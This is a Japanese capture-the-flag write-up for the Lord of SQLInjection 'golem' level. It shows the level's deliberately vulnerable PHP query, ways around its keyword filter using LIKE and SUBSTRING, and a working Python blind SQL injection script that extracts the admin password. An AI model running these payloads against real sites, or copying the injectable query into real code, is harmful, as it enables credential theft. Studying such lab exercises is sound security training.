include "./config.php"; login_chk(); $db = dbconnect(); if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~"); if(preg_match('/or|and|substr\(|=/i', $_GET[pw])) exit("HeHe"); $query = "select id from prob_golem where id='guest' and pw='{$_GET[pw]}'"; echo "<hr>query : <strong>{$query}</strong><hr><br>"; $result = @mysqli_fetch_array(mysqli_query($db,$query)); if($result['id']) echo "<h2>Hello {$result[id]}</h2>"; $_GET[pw] = addslashes($_GET[pw]); $query = "select pw from prob_golem where id='admin' and pw='{$_GET[pw]}'"; $result = @mysqli_fetch_array(mysqli_query($db,$query)); if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("golem"); highlight_file(__FILE__);
特徴は以下。
- pwのみ入力するが、以下フィルターがある
or,and,substr(,=
が含まれればエラー- adminのパスワードを抜き取る必要がある
Blind SQL Injectionを頑張るやつですね。
代用する
=が使えないと文字列比較ができないように見えて、like文で代用ができる。
' || id like 'admin' && {md} < length(pw) #
substrは使えないが、SUBSTRINGやMIDで代用することができる。
' || id like 'admin' && {md} < ascii(SUBSTRING(pw,{i+1},1)) #
import requests url = "https://los.rubiya.kr/chall/golem_4b5asdfasdfasdff5.php" cookie = {'PHPSESSID': 'easdfsafsafsadfasdf'} def check(data) -> bool: return "Hello admin" in data ok = 0 ng = 30 while ok + 1 != ng: md = (ok + ng) // 2 q = f"' || id like 'admin' && {md} < length(pw) #" res = requests.get(url, params={'pw': q}, cookies=cookie) print(f"[+] try {md}") if check(res.text): ok = md else: ng = md length = ok + 1 print(f"[*] length = {length}") ans = "" for i in range(0, length): ok = 0 ng = 127 while ok + 1 != ng: md = (ok + ng) // 2 q = f"' || id like 'admin' && {md} < ascii(SUBSTRING(pw,{i+1},1)) #" res = requests.get(url, params={'pw': q}, cookies=cookie) print(f"[+] try {md}") if check(res.text): ok = md else: ng = md ans += str(chr(ok + 1)) print(f"[*] {ans}") print(f"[*] find! {ans}")